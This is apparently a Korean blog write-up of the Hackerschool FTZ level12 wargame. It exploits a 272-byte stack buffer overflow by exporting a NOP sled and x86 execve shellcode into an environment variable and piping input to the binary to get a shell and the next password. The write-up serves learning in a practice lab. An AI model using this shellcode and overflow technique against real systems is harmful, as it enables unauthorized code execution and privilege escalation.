level12
힌트를 확인해보면 11번과 비슷하게 overflow 문제인 것을 확인할 수 있다.
gdb로 프로그램을 확인해보면 마찬가지로 272byte인 것을 확인할 수 있다.
export GS=`python -c 'print "\x90"*50+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
11번과 동일하게 환경변수와 프로그램을 작성하여 환경변수의 주소값을 확인해줬다.
(python ~)|./attackme 형식으로 입력하면 파이썬 코드로 입력할 수 있다. 하지만 실행되지 않아서 방법을 찾아보니 cat 명령을 사용하여 프로그램을 잡아두라고 하였다.
그렇게 하여 my-pass 명령을 사용하니 패스워드를 획득할 수 있었다.
have no clue
728x90
'CTF > 시스템' 카테고리의 다른 글
| 해커스쿨 FTZ level14 (0) | 2020.09.22 |
|---|---|
| 해커스쿨 FTZ level13 (0) | 2020.09.22 |
| 해커스쿨 FTZ level11 (0) | 2020.09.17 |
| 해커스쿨 FTZ level10 (0) | 2020.08.27 |
| 해커스쿨 FTZ level9 (0) | 2020.08.27 |